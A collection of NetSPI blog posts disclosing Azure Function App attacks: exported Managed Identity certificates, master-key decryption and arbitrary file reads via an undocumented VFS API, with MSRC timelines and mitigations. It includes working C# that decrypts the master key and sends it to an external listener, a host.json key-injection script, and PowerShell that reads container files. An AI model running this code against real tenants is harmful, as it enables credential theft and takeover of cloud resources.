We then opened the certificate file in Windows to see that it was a valid PFX file, that did not have an attached password, and we then imported it into our local certificate store. Investigating the certificate information in our certificate store, we noted that the “Issued to:” GUID matched the Managed Identity’s Service Principal ID (b1abdc5c-3e68-476a-9191-428c1300c50c). 

After installing the certificate, we were then able to use the certificate to authenticate to the Az PowerShell module as the Managed Identity.

PS C:\> Connect-AzAccount -ServicePrincipal -Tenant [REDACTED] -CertificateThumbprint BC5C431024BC7F52C8E9F43A7387D6021056630A -ApplicationId b1abdc5c-3e68-476a-9191-428c1300c50c

Account                                      SubscriptionName    TenantId       Environment
-------                                      ----------------    --------       -----------
b1abdc5c-3e68-476a-9191-428c1300c50c         Research            [REDACTED]     AzureCloud

For anyone who has worked with Managed Identities in Azure, you’ll immediately know that this fundamentally breaks the intended usage of a Managed Identity on an Azure resource. Managed Identity credentials are never supposed to be accessed by users in Azure, and the Service Principal App Registration (where you would validate the existence of these credentials) for the Managed Identity isn’t visible in the Azure Portal. The intent of Managed Identities is to grant temporary token-based access to the identity, only from the resource that has the identity attached.

While the Portal UI restricts visibility into the Service Principal App Registration, the details are available via the Get-AzADServicePrincipal Az PowerShell function. The exported certificate files have a 6-month (180 day) expiration date, but the actual credential storage mechanism in Azure AD (now Entra ID) has a 3-month (90 day) rolling rotation for the Managed Identity certificates. On the plus side, certificates are not deleted from the App Registration after the replacement certificate has been created. Based on our observations, it appears that you can make use of the full 3-month life of the certificate, with one month overlapping the new certificate that is issued.

It should be noted that while this proof of concept shows exploitation through Contributor-level access to the Function App, any attacker who gained command execution on the Function App container would have been able to execute this attack and gain access to the attached Managed Identity credentials and Function App keys. There are a number of ways an attacker could get command execution in the container; we've highlighted a few options in the talk that originated this line of research.

Conclusion / MSRC Response

At this point in the research, we quickly put together a report and filed it with MSRC. Here’s what the process looked like:

  • 7/12/23 - Initial discovery of the issue and filing of the report with MSRC
  • 7/13/23 – MSRC opens Case 80917 to manage the issue
  • 8/02/23 – NetSPI requests update on status of the issue
  • 8/03/23 – Microsoft closes the case and issues the following response:
Hi Karl,
 
Thank you for your patience.
 
MSRC has investigated this issue and concluded that this does not pose an immediate threat that requires urgent attention. This is because, for an attacker or user who already has publish access, this issue did not provide any additional access than what is already available. However, the teams agree that access to relevant filesystems and other information needs to be limited.
 
The teams are working on the fix for this issue per their timelines and will take appropriate action as needed to help keep customers protected.
 
As such, this case is being closed.
 
Thank you, we absolutely appreciate your flagging this issue to us, and we look forward to more submissions from you in the future!
  • 8/03/23 – NetSPI replies, restating the issue and attempting to clarify MSRC’s understanding of the issue
  • 8/04/23 – MSRC Reopens the case, partly thanks to a thread of tweets
  • 9/11/23 - Follow up email with MSRC confirms the fix is in progress
  • 11/16/23 – NetSPI discloses the issue publicly

Microsoft’s solution for this issue was to encrypt the “MSISpecializationPayload” and rename it to “EncryptedTokenServiceSpecializationPayload”. It's unclear how this is getting encrypted, but we were able to confirm that the key that encrypts the credentials does not exist in the container that runs the user code.

It should be noted that the decryption technique for the “CONTAINER_START_CONTEXT_SAS_URI” still works to expose the Function App keys. So, if you do manage to get code execution in a Function App container, you can still potentially use this technique to persist on the Function App. 


Prior Research Note:
While doing our due diligence for this blog, we tried to find any prior research on this topic. It appears that Trend Micro also found this issue and disclosed it in June of 2022.

[post_title] => Mistaken Identity: Extracting Managed Identity Credentials from Azure Function Apps  [post_excerpt] => NetSPI explores extracting managed identity credentials from Azure Function Apps to expose sensitive data. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => mistaken-identity-azure-function-apps [to_ping] => [pinged] => [post_modified] => 2023-11-15 20:46:26 [post_modified_gmt] => 2023-11-16 02:46:26 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=31440 [menu_order] => 34 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [4] => WP_Post Object ( [ID] => 31226 [post_author] => 53 [post_date] => 2023-10-11 18:05:48 [post_date_gmt] => 2023-10-11 23:05:48 [post_content] =>
Watch Now

At Black Hat, NetSPI VP of Research Karl Fosaaen sat down with the host of the Cloud Security Podcast Ashish Rajan to discuss all things Azure penetration testing.

During the conversation, he addressed unique challenges associated with conducting penetration tests on web applications hosted within the Azure Cloud. He also provided valuable insights into the specialized skills required for effective penetration testing in Azure environments.

Contrary to common misconceptions, cloud penetration testing in Microsoft Azure is far more complex than a mere configuration review, a misconception that extends to other cloud providers like AWS and Google Cloud as well. In this video, Karl addresses several important questions and methodologies, clarifying the distinct nature of penetration testing within the Azure ecosystem.

[wonderplugin_video iframe="https://youtu.be/Y0BkXKthQ5c" lightbox=0 lightboxsize=1 lightboxwidth=1200 lightboxheight=674.999999999999916 autoopen=0 autoopendelay=0 autoclose=0 lightboxtitle="" lightboxgroup="" lightboxshownavigation=0 showimage="" lightboxoptions="" videowidth=1200 videoheight=674.999999999999916 keepaspectratio=1 autoplay=0 loop=0 videocss="position:relative;display:block;background-color:#000;overflow:hidden;max-width:100%;margin:0 auto;" playbutton="https://www.netspi.com/wp-content/plugins/wonderplugin-video-embed/engine/playvideo-64-64-0.png"]

[post_title] => Azure Cloud Security Pentesting Skills [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => azure-cloud-security-pentesting-skills [to_ping] => [pinged] => [post_modified] => 2023-10-11 18:05:51 [post_modified_gmt] => 2023-10-11 23:05:51 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?post_type=webinars&p=31226 [menu_order] => 12 [post_type] => webinars [post_mime_type] => [comment_count] => 0 [filter] => raw ) [5] => WP_Post Object ( [ID] => 31207 [post_author] => 10 [post_date] => 2023-10-10 13:30:47 [post_date_gmt] => 2023-10-10 18:30:47 [post_content] =>

Today, we are excited to introduce you to the transformed Dark Side Ops (DSO) training courses by NetSPI. With years of experience under our belt, we've taken our renowned DSO courses and reimagined them to offer a dynamic, self-directed approach. 

The Evolution of DSO

Traditionally, our DSO courses were conducted in-person, offering a blend of expert-led lectures and hands-on labs. However, the pandemic prompted us to adapt. We shifted to remote learning via Zoom, but we soon realized that we were missing the interactivity and personalized pace that made in-person training so impactful. 

A Fresh Approach

In response to this, we've reimagined DSO for the modern era. Presenting our self-directed, student-paced online courses that give you the reins to your learning journey. While preserving the exceptional content, we've infused a new approach that includes: 

  • Video Lectures: Engaging video presentations that bring the classroom to your screen, allowing you to learn at your convenience. 
  • Real-World Labs: Our DSO courses now enable you to create your own hands-on lab environment, bridging the gap between theory and practice. 
  • Extended Access: Say goodbye to rushed deadlines. You now have a 90-day window to complete the course at your own pace, ensuring a comfortable and comprehensive learning experience. 
  • Quality, Reimagined: We are unwavering in our commitment to upholding the highest training standards. Your DSO experience will continue to be exceptional. 
  • Save Big: For those eager to maximize their learning journey, register for all three courses and save $1,500. 

What is DSO?

DSO 1: Malware Dev Training

  • Dive deep into source code to gain a strong understanding of execution vectors, payload generation, automation, staging, command and control, and exfiltration. Intensive, hands-on labs provide even intermediate participants with a structured and challenging approach to write custom code and bypass the very latest in offensive countermeasures. 

DSO 2: Adversary Simulation Training

  • Do you want to be the best resource when the red team is out of options? Can you understand, research, build, and integrate advanced new techniques into existing toolkits? Challenge yourself to move beyond blog posts, how-tos, and simple payloads. Let’s start simulating real world threats with real world methodology. 

DSO Azure: Azure Cloud Pentesting Training 

  • Traditional penetration testing has focused on physical assets on internal and external networks. As more organizations begin to shift these assets up to cloud environments, penetration testing processes need to be updated to account for the complexities introduced by cloud infrastructure. 

Join us on this journey of continuous learning, where we're committed to supporting you every step of the way. Register for Dark Side Ops today.

Join our mailing list for more updates and remember, in the realm of cybersecurity, constant evolution is key. We are here to help you stay ahead in this ever-evolving landscape. 

[post_title] => NetSPI's Dark Side Ops Courses: Evolving Cybersecurity Excellence [post_excerpt] => Check out our evolved Dark Side Operations courses with a fully virtual model to evolve your cybersecurity skillset. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => dark-side-ops-courses-evolving-cybersecurity-excellence [to_ping] => [pinged] => [post_modified] => 2023-10-10 13:39:14 [post_modified_gmt] => 2023-10-10 18:39:14 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=31207 [menu_order] => 50 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [6] => WP_Post Object ( [ID] => 30784 [post_author] => 37 [post_date] => 2023-08-12 13:30:00 [post_date_gmt] => 2023-08-12 18:30:00 [post_content] =>

When deploying an Azure Function App, you’re typically prompted to select a Storage Account to use in support of the application. Access to these supporting Storage Accounts can lead to disclosure of Function App source code, command execution in the Function App, and (as we’ll show in this blog) decryption of the Function App Access Keys.

Azure Function Apps use Access Keys to secure access to HTTP Trigger functions. There are three types of access keys that can be used: function, system, and master (HTTP function endpoints can also be accessed anonymously). The most privileged access key available is the master key, which grants administrative access to the Function App including being able to read and write function source code.  

The master key should be protected and should not be used for regular activities. Gaining access to the master key could lead to supply chain attacks and control of any managed identities assigned to the Function. This blog explores how an attacker can decrypt these access keys if they gain access via the Function App’s corresponding Storage Account. 

TL;DR 

  • Function App Access Keys can be stored in Storage Account containers in an encrypted format 
  • Access Keys can be decrypted within the Function App container AND offline 
  • Works with Windows or Linux, with any runtime stack 
  • Decryption requires access to the decryption key (stored in an environment variable in the Function container) and the encrypted key material (from host.json). 

Previous Research 

Function Apps depend on Storage Accounts at multiple product tiers for code and secret storage. Extensive research has already been done on attacking Functions directly and via their corresponding Storage Accounts. This blog will focus specifically on key decryption for Function takeover. 

Requirements 

Required Permissions 

  • Permission to read Storage Account Container blobs, specifically the host.json file (located in Storage Account Containers named “azure-webjobs-secrets”) 
  • Permission to write to Azure File Shares hosting Function code
Screenshot of Storage Accounts associated with a Function App

The host.json file contains the encrypted access keys. The encrypted master key is contained in the masterKey.value field.

{ 
  "masterKey": { 
    "name": "master", 
    "value": "CfDJ8AAAAAAAAAAAAAAAAAAAAA[TRUNCATED]IA", 
    "encrypted": true 
  }, 
  "functionKeys": [ 
    { 
      "name": "default", 
      "value": "CfDJ8AAAAAAAAAAAAAAAAAAAAA[TRUNCATED]8Q", 
      "encrypted": true 
    } 
  ], 
  "systemKeys": [],
  "hostName": "thisisafakefunctionappprobably.azurewebsites.net",
  "instanceId": "dc[TRUNCATED]c3",
  "source": "runtime",
  "decryptionKeyId": "MACHINEKEY_DecryptionKey=op+[TRUNCATED]Z0=;"
}
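One consequence of this file being attacker-writable is that the encrypted values don't have to be decrypted to be abused: the master key can simply be replaced with a cleartext value and the "encrypted" flag set to false. A Python sketch of that rewrite (the key value here is made up for illustration):

```python
import json


def inject_cleartext_master_key(host_json_text: str, new_key: str) -> str:
    """Rewrite a host.json blob so the master key is a cleartext value
    of the attacker's choosing. The modified file would then be written
    back to the azure-webjobs-secrets container."""
    doc = json.loads(host_json_text)
    doc["masterKey"]["value"] = new_key
    # Setting "encrypted" to false tells the Functions host to treat the
    # value as cleartext rather than Data Protection ciphertext
    doc["masterKey"]["encrypted"] = False
    return json.dumps(doc, indent=2)
```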

The code for the corresponding Function App is stored in Azure File Shares. For what it's worth, with access to the host.json file, an attacker can technically overwrite existing keys and set the "encrypted" parameter to false to inject their own cleartext function keys into the Function App (see Rogier Dijkman’s research). The directory structure for a Windows ASP.NET Function App (thisisnotrealprobably) typically places each function in its own folder under the wwwroot directory of the File Share. 

A new function can be created by adding a new set of folders under the wwwroot folder in the SMB file share. 

The ability to create a new function trigger by creating folders in the File Share is necessary to either decrypt the key in the function runtime OR return the decryption key by retrieving a specific environment variable. 

Decryption in the Function container 

Function App Key Decryption is dependent on ASP.NET Core Data Protection. There are multiple references to a specific library for Function Key security in the Function Host code.  

An old version of this library can be found at https://github.com/Azure/azure-websites-security. This library creates a Function specific Azure Data Protector for decryption. The code below has been modified from an old MSDN post to integrate the library directly into a .NET HTTP trigger. Providing the encrypted master key to the function decrypts the key upon triggering. 

The sample code below can be modified to decrypt the key and then send the key to a publicly available listener. 

#r "Newtonsoft.Json" 

using Microsoft.AspNetCore.DataProtection; 
using Microsoft.Azure.Web.DataProtection; 
using System.Net.Http; 
using System.Text; 
using System.Net; 
using Microsoft.AspNetCore.Mvc; 
using Microsoft.Extensions.Primitives; 
using Newtonsoft.Json; 

private static HttpClient httpClient = new HttpClient(); 

public static async Task<IActionResult> Run(HttpRequest req, ILogger log) 
{ 
    log.LogInformation("C# HTTP trigger function processed a request."); 

    DataProtectionKeyValueConverter converter = new DataProtectionKeyValueConverter(); 
    string keyname = "master"; 
    string encval = "Cf[TRUNCATED]NQ"; 
    var ikey = new Key(keyname, encval, true); 

    if (ikey.IsEncrypted) 
    { 
        ikey = converter.ReadValue(ikey); 
    } 
    // log.LogInformation(ikey.Value); 
    string url = "https://[TRUNCATED]"; 
    string body = $"{{\"name\":\"{keyname}\", \"value\":\"{ikey.Value}\"}}"; 
    var response = await httpClient.PostAsync(url, new StringContent(body.ToString())); 

    string name = req.Query["name"]; 

    string requestBody = await new StreamReader(req.Body).ReadToEndAsync(); 
    dynamic data = JsonConvert.DeserializeObject(requestBody); 
    name = name ?? data?.name; 

    string responseMessage = string.IsNullOrEmpty(name) 
        ? "This HTTP triggered function executed successfully. Pass a name in the query string or in the request body for a personalized response." 
                : $"Hello, {name}. This HTTP triggered function executed successfully."; 

            return new OkObjectResult(responseMessage); 
} 

class DataProtectionKeyValueConverter 
{ 
    private readonly IDataProtector _dataProtector; 
 
    public DataProtectionKeyValueConverter() 
    { 
        var provider = DataProtectionProvider.CreateAzureDataProtector(); 
        _dataProtector = provider.CreateProtector("function-secrets"); 
    } 

    public Key ReadValue(Key key) 
    { 
        var resultKey = new Key(key.Name, null, false); 
        resultKey.Value = _dataProtector.Unprotect(key.Value); 
        return resultKey; 
    } 
} 

class Key 
{ 
    public Key(){} 

    public Key(string name, string value, bool encrypted) 
    { 
        Name = name; 
        Value = value; 
        IsEncrypted = encrypted; 
    } 

    [JsonProperty(PropertyName = "name")] 
    public string Name { get; set; } 

    [JsonProperty(PropertyName = "value")] 
    public string Value { get; set; } 

    [JsonProperty(PropertyName = "encrypted")] 
    public bool IsEncrypted { get; set; }
}

Triggering via browser: 

Screenshot of triggering via browser saying This HTTP triggered function executed successfully. Pass a name in the query body for a personalized response.

Burp Collaborator:

Screenshot of Burp collaborator.

Master key:

Screenshot of Master key.

Local Decryption 

Decryption can also be done outside of the function container. The https://github.com/Azure/azure-websites-security repo contains an older version of the code that can be pulled down and run locally through Visual Studio. However, there is one requirement for running locally and that is access to the decryption key.

The code makes multiple references to the location of default keys:

The Constants.cs file leads to two environment variables of note: AzureWebEncryptionKey (default) or MACHINEKEY_DecryptionKey. The decryption code defaults to the AzureWebEncryptionKey environment variable.  

One thing to keep in mind is that the environment variable will be different depending on the underlying Function operating system. Linux based containers will use AzureWebEncryptionKey while Windows will use MACHINEKEY_DecryptionKey. One of those environment variables will be available via Function App Trigger Code, regardless of the runtime used. The environment variable values can be returned in the Function by using native code. Example below is for PowerShell in a Windows environment: 

$env:MACHINEKEY_DecryptionKey

This can then be returned to the user via an HTTP Trigger response or by having the Function send the value to another endpoint. 
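For a Function App running the Python worker, the same lookup can be sketched in trigger code. This is a minimal sketch: the HTTP binding plumbing is omitted, the helper name is ours, and only the environment lookup (using the variable names above) is shown.

```python
import os

def get_decryption_key() -> str:
    """Return the key material from whichever variable the OS flavor uses.

    MACHINEKEY_DecryptionKey is used on Windows containers,
    AzureWebEncryptionKey on Linux containers.
    """
    for var in ("MACHINEKEY_DecryptionKey", "AzureWebEncryptionKey"):
        value = os.environ.get(var)
        if value:
            return f"{var}={value}"
    return "no decryption key variable found"
```

In a real trigger, the returned string would be set as the HTTP response body or shipped to another endpoint, as described above.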

The local decryption can be done once the encrypted key data and the decryption keys are obtained. After pulling down the GitHub repo and setting it up in Visual Studio, quick decryption can be done directly through an existing test case in DataProtectionProviderTests.cs. The following edits can be made.

// Copyright (c) .NET Foundation. All rights reserved. 
// Licensed under the MIT License. See License.txt in the project root for license information. 

using System; 
using Microsoft.Azure.Web.DataProtection; 
using Microsoft.AspNetCore.DataProtection; 
using Xunit; 
using System.Diagnostics; 
using System.IO; 

namespace Microsoft.Azure.Web.DataProtection.Tests 
{ 
    public class DataProtectionProviderTests 
    { 
        [Fact] 
        public void EncryptedValue_CanBeDecrypted()  
        { 
            using (var variables = new TestScopedEnvironmentVariable(Constants.AzureWebsiteLocalEncryptionKey, "CE[TRUNCATED]1B")) 
            { 
                var provider = DataProtectionProvider.CreateAzureDataProtector(null, true); 

                var protector = provider.CreateProtector("function-secrets"); 

                string expected = "test string"; 

                // string encrypted = protector.Protect(expected); 
                string encrypted = "Cf[TRUNCATED]8w"; 

                string result = protector.Unprotect(encrypted); 

                File.WriteAllText("test.txt", result); 
                Assert.Equal(expected, result); 
            } 
        } 
    } 
} 

Run the test case after replacing the two truncated values with the decryption key and the encrypted key data. The test will fail, but the decrypted master key will be written to test.txt! This can then be used to query the Function App administrative REST APIs. 

Tool Overview 

NetSPI created a proof-of-concept tool to exploit Function Apps through the connected Storage Account. The tool requires write access to the corresponding File Share where the Function code is stored, and it supports the .NET, PSCore, Python, and Node runtimes. Given a Storage Account that is connected to a Function App, the tool will attempt to create an HTTP Trigger (a function-specific API key is required for access) that returns the decryption key and scoped Managed Identity access tokens (if applicable). The tool will also attempt to clean up any uploaded code once the key and tokens are received.  

Once the encryption key and encrypted function app key are returned, you can use the Function App code included in the repo to decrypt the master key. To make it easier, we’ve provided an ARM template in the repo that will create the decryption Function App for you.

Screenshot of welcome screen to the NetSPI "FuncoPop" app (Function App Key Decryption).

See the GitHub link https://github.com/NetSPI/FuncoPop for more info. 

Prevention and Mitigation 

There are a number of ways to prevent the attack scenarios outlined in this blog and in previous research. The best prevention strategy is to treat the corresponding Storage Accounts as an extension of the Function Apps. This includes: 

  1. Limiting the use of Storage Account Shared Access Keys and ensuring that they are not stored in cleartext.
  1. Rotating Shared Access Keys regularly. 
  1. Limiting the creation of privileged, long-lasting SAS tokens. 
  1. Applying the principle of least privilege: only grant the minimum privileges necessary, at the narrowest scope. Be aware of any roles that grant write access to Storage Accounts (including roles with list keys permissions!). 
  1. Identifying Function Apps that use Storage Accounts and ensuring that these resources are placed in dedicated Resource Groups.
  1. Avoiding shared Storage Accounts for multiple Function Apps. 
  1. Ensuring that Diagnostic Settings are in place to collect audit and data plane logs. 

More direct mitigations can also be applied, such as storing keys in Key Vaults or restricting Storage Accounts to VNETs. See the links below for Microsoft recommendations. 

MSRC Timeline 

As part of our standard Azure research process, we ran our findings by MSRC before publishing anything. 

02/08/2023 - Initial report created
02/13/2023 - Case closed as expected and documented behavior
03/08/2023 - Second report created
04/25/2023 - MSRC confirms original assessment as expected and documented behavior 
08/12/2023 - DefCon Cloud Village presentation 

Thanks to Nick Landers for his help/research into ASP.NET Core Data Protection. 

[post_title] => What the Function: Decrypting Azure Function App Keys  [post_excerpt] => When deploying an Azure Function App, access to supporting Storage Accounts can lead to disclosure of source code, command execution in the app, and decryption of the app’s Access Keys. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => what-the-function-decrypting-azure-function-app-keys [to_ping] => [pinged] => [post_modified] => 2023-08-08 09:25:11 [post_modified_gmt] => 2023-08-08 14:25:11 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=30784 [menu_order] => 67 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [7] => WP_Post Object ( [ID] => 29749 [post_author] => 10 [post_date] => 2023-03-23 08:24:36 [post_date_gmt] => 2023-03-23 13:24:36 [post_content] =>

As penetration testers, we continue to see an increase in applications built natively in the cloud. These are a mix of legacy applications that are ported to cloud-native technologies and new applications that are freshly built in the cloud provider. One of the technologies that we see being used to support these development efforts is Azure Function Apps. We recently took a deeper look at some of the Function App functionality that resulted in a privilege escalation scenario for users with Reader role permissions on Function Apps. In the case of functions running in Linux containers, this resulted in command execution in the application containers. 

TL;DR 

Undocumented APIs used by the Azure Function Apps Portal menu allowed for arbitrary file reads on the Function App containers.  

  • For the Windows containers, this resulted in access to ASP.NET encryption keys. 
  • For the Linux containers, this resulted in access to function master keys that allowed for overwriting Function App code and gaining remote code execution in the container. 
https://www.youtube.com/watch?v=ClCeHiKIQqE

What are Azure Function Apps?

As noted above, Function Apps are one of the pieces of technology used for building cloud-native applications in Azure. The service falls under the umbrella of “App Services” and has many of the common features of the parent service. At its core, the Function App service is a lightweight API service that can be used for hosting serverless application services.  

The Azure Portal allows users (with Reader or greater permissions) to view files associated with the Function App, along with the code for the application endpoints (functions). In the Azure Portal, under App files, we can see the files available at the root of the Function App. These are usually requirement files and any supporting files you want to have available for all underlying functions. 

An example of a file available at the root of the Function App within the Azure Portal.

Under the individual functions (HttpTrigger1), we can enter the Code + Test menu to see the source code for the function. Much like the code in an Automation Account Runbook, the function code is available to anyone with Reader permissions. We do frequently find hardcoded credentials in this menu, so this is a common menu for us to work with. 

A screenshot of the source for the function (HttpTrigger1).

Both file viewing options rely on an undocumented API that can be found by proxying your browser traffic while accessing the Azure Portal. The following management.azure.com API endpoint uses the VFS function to list files in the Function App:

https://management.azure.com/subscriptions/$SUB_ID/resourceGroups/tester/providers/Microsoft.Web/sites/vfspoc/hostruntime/admin/vfs//?relativePath=1&api-version=2021-01-15 

In the example above, $SUB_ID would be your subscription ID, and this is for the “vfspoc” Function App in the “tester” resource group.
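The listing can also be scripted outside the Portal. Below is a minimal Python sketch using only the standard library; the helper names (build_vfs_url, list_vfs) are ours, and a valid ARM bearer token for an account with at least the Reader role is assumed.

```python
import json
import urllib.request

API_VERSION = "2021-01-15"

def build_vfs_url(sub_id, resource_group, app_name, relative_path=1, path=""):
    """Construct the undocumented hostruntime VFS listing URL."""
    return (
        f"https://management.azure.com/subscriptions/{sub_id}"
        f"/resourceGroups/{resource_group}/providers/Microsoft.Web"
        f"/sites/{app_name}/hostruntime/admin/vfs/{path}/"
        f"?relativePath={relative_path}&api-version={API_VERSION}"
    )

def list_vfs(url, token):
    """List files via the VFS API using an ARM access token."""
    req = urllib.request.Request(url, headers={"Authorization": f"Bearer {token}"})
    with urllib.request.urlopen(req) as resp:
        return json.loads(resp.read())
```

For example, `list_vfs(build_vfs_url(sub_id, "tester", "vfspoc"), token)` should return the same JSON listing shown below.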


Discovery of the Issue

Using the identified URL, we started enumerating available files in the output:

[
  {
    "name": "host.json",
    "size": 141,
    "mtime": "2022-08-02T19:49:04.6152186+00:00",
    "crtime": "2022-08-02T19:49:04.6092235+00:00",
    "mime": "application/json",
    "href": "https://vfspoc.azurewebsites.net/admin/vfs/host.json?relativePath=1&api-version=2021-01-15",
    "path": "C:\\home\\site\\wwwroot\\host.json"
  },
  {
    "name": "HttpTrigger1",
    "size": 0,
    "mtime": "2022-08-02T19:51:52.0190425+00:00",
    "crtime": "2022-08-02T19:51:52.0190425+00:00",
    "mime": "inode/directory",
    "href": "https://vfspoc.azurewebsites.net/admin/vfs/HttpTrigger1%2F?relativePath=1&api-version=2021-01-15",
    "path": "C:\\home\\site\\wwwroot\\HttpTrigger1"
  }
]

As we can see above, this is the expected output. We can see the host.json file that is available in the Azure Portal, and the HttpTrigger1 function directory. At first glance, this may seem like nothing. While reviewing some function source code in client environments, we noticed that additional directories were being added to the Function App root directory to add libraries and supporting files for use in the functions. These files are not visible in the Portal if they’re in a directory (See “Secret Directory” below). The Portal menu doesn’t have folder handling built in, so these files seem to be invisible to anyone with the Reader role. 

Function app files menu not showing the secret directory in the file drop down.

By using the VFS APIs, we can view all the files in these application directories, including sensitive files that the Azure Function App Contributors might have assumed were hidden from Readers. While this is a minor information disclosure, we can take the issue further by modifying the “relativePath” parameter in the URL from a “1” to a “0”. 

Changing this parameter allows us to now see the direct file system of the container. In this first case, we’re looking at a Windows Function App container. As a test harness, we’ll use a little PowerShell to grab a “management.azure.com” token from our authenticated (as a Reader) Azure PowerShell module session, and feed that to the API for our requests to read the files from the vfspoc Function App. 

$mgmtToken = (Get-AzAccessToken -ResourceUrl "https://management.azure.com").Token 

(Invoke-WebRequest -Verbose:$false -Uri (-join ("https://management.azure.com/subscriptions/$SUB_ID/resourceGroups/tester/providers/Microsoft.Web/sites/vfspoc/hostruntime/admin/vfs//?relativePath=0&api-version=2021-01-15")) -Headers @{Authorization="Bearer $mgmtToken"}).Content | ConvertFrom-Json 

name   : data 
size   : 0 
mtime  : 2022-09-12T20:20:48.2362984+00:00 
crtime : 2022-09-12T20:20:48.2362984+00:00 
mime   : inode/directory 
href   : https://vfspoc.azurewebsites.net/admin/vfs/data%2F?relativePath=0&api-version=2021-01-15 
path   : D:\home\data 

name   : LogFiles 
size   : 0 
mtime  : 2022-09-12T20:20:02.5561162+00:00 
crtime : 2022-09-12T20:20:02.5561162+00:00 
mime   : inode/directory 
href   : https://vfspoc.azurewebsites.net/admin/vfs/LogFiles%2F?relativePath=0&api-version=2021-01-15 
path   : D:\home\LogFiles 

name   : site 
size   : 0 
mtime  : 2022-09-12T20:20:02.5701081+00:00 
crtime : 2022-09-12T20:20:02.5701081+00:00 
mime   : inode/directory 
href   : https://vfspoc.azurewebsites.net/admin/vfs/site%2F?relativePath=0&api-version=2021-01-15 
path   : D:\home\site 

name   : ASP.NET 
size   : 0 
mtime  : 2022-09-12T20:20:48.2362984+00:00 
crtime : 2022-09-12T20:20:48.2362984+00:00 
mime   : inode/directory 
href   : https://vfspoc.azurewebsites.net/admin/vfs/ASP.NET%2F?relativePath=0&api-version=2021-01-15 
path   : D:\home\ASP.NET

Access to Encryption Keys on the Windows Container

With access to the container’s underlying file system, we’re now able to browse into the ASP.NET directory on the container. This directory contains the “DataProtection-Keys” subdirectory, which houses xml files with the encryption keys for the application. 

Here’s an example URL and file for those keys:

https://management.azure.com/subscriptions/$SUB_ID/resourceGroups/tester/providers/Microsoft.Web/sites/vfspoc/hostruntime/admin/vfs//ASP.NET/DataProtection-Keys/key-ad12345a-e321-4a1a-d435-4a98ef4b3fb5.xml?relativePath=0&api-version=2018-11-01 

<?xml version="1.0" encoding="utf-8"?> 
<key id="ad12345a-e321-4a1a-d435-4a98ef4b3fb5" version="1"> 
  <creationDate>2022-03-29T11:23:34.5455524Z</creationDate> 
  <activationDate>2022-03-29T11:23:34.2303392Z</activationDate> 
  <expirationDate>2022-06-27T11:23:34.2303392Z</expirationDate> 
  <descriptor deserializerType="Microsoft.AspNetCore.DataProtection.AuthenticatedEncryption.ConfigurationModel.AuthenticatedEncryptorDescriptorDeserializer, Microsoft.AspNetCore.DataProtection, Version=3.1.18.0, Culture=neutral, PublicKeyToken=ace99892819abce50"> 
    <descriptor> 
      <encryption algorithm="AES_256_CBC" /> 
      <validation algorithm="HMACSHA256" /> 
      <masterKey p4:requiresEncryption="true" xmlns:p4="https://schemas.asp.net/2015/03/dataProtection"> 
        <!-- Warning: the key below is in an unencrypted form. --> 
        <value>a5[REDACTED]==</value> 
      </masterKey> 
    </descriptor> 
  </descriptor> 
</key> 

While we couldn’t use these keys during the initial discovery of this issue, there is potential for these keys to be abused for decrypting information from the Function App. Additionally, we have more pressing issues to look at in the Linux container.

Command Execution on the Linux Container

Since Function Apps can run in both Windows and Linux containers, we decided to spend a little time on the Linux side with these APIs. Using the same API URLs as before, we change them over to a Linux container function app (vfspoc2). As we see below, this same API (with “relativePath=0”) now exposes the Linux base operating system files for the container:

https://management.azure.com/subscriptions/$SUB_ID/resourceGroups/tester/providers/Microsoft.Web/sites/vfspoc2/hostruntime/admin/vfs//?relativePath=0&api-version=2021-01-15 

JSON output parsed into a PowerShell object: 
name   : lost+found 
size   : 0 
mtime  : 1970-01-01T00:00:00+00:00 
crtime : 1970-01-01T00:00:00+00:00 
mime   : inode/directory 
href   : https://vfspoc2.azurewebsites.net/admin/vfs/lost%2Bfound%2F?relativePath=0&api-version=2021-01-15 
path   : /lost+found 

[Truncated] 

name   : proc 
size   : 0 
mtime  : 2022-09-14T22:28:57.5032138+00:00 
crtime : 2022-09-14T22:28:57.5032138+00:00 
mime   : inode/directory 
href   : https://vfspoc2.azurewebsites.net/admin/vfs/proc%2F?relativePath=0&api-version=2021-01-15 
path   : /proc 

[Truncated] 

name   : tmp 
size   : 0 
mtime  : 2022-09-14T22:56:33.6638983+00:00 
crtime : 2022-09-14T22:56:33.6638983+00:00 
mime   : inode/directory 
href   : https://vfspoc2.azurewebsites.net/admin/vfs/tmp%2F?relativePath=0&api-version=2021-01-15 
path   : /tmp 

name   : usr 
size   : 0 
mtime  : 2022-09-02T21:47:36+00:00 
crtime : 1970-01-01T00:00:00+00:00 
mime   : inode/directory 
href   : https://vfspoc2.azurewebsites.net/admin/vfs/usr%2F?relativePath=0&api-version=2021-01-15 
path   : /usr 

name   : var 
size   : 0 
mtime  : 2022-09-03T21:23:43+00:00 
crtime : 2022-09-03T21:23:43+00:00 
mime   : inode/directory 
href   : https://vfspoc2.azurewebsites.net/admin/vfs/var%2F?relativePath=0&api-version=2021-01-15 
path   : /var 

Breaking out one of my favorite NetSPI blogs, Directory Traversal, File Inclusion, and The Proc File System, we know that we can potentially access environmental variables for different PIDs that are listed in the “proc” directory.  

Description of the function of the environ file in the proc file system.

If we request a listing of the proc directory, we can see that there are a handful of PIDs (denoted by the numbers) listed:

https://management.azure.com/subscriptions/$SUB_ID/resourceGroups/tester/providers/Microsoft.Web/sites/vfspoc2/hostruntime/admin/vfs//proc/?relativePath=0&api-version=2021-01-15 

JSON output parsed into a PowerShell object: 
name   : fs 
size   : 0 
mtime  : 2022-09-21T22:00:39.3885209+00:00 
crtime : 2022-09-21T22:00:39.3885209+00:00 
mime   : inode/directory 
href   : https://vfspoc2.azurewebsites.net/admin/vfs/proc/fs/?relativePath=0&api-version=2021-01-15 
path   : /proc/fs 

name   : bus 
size   : 0 
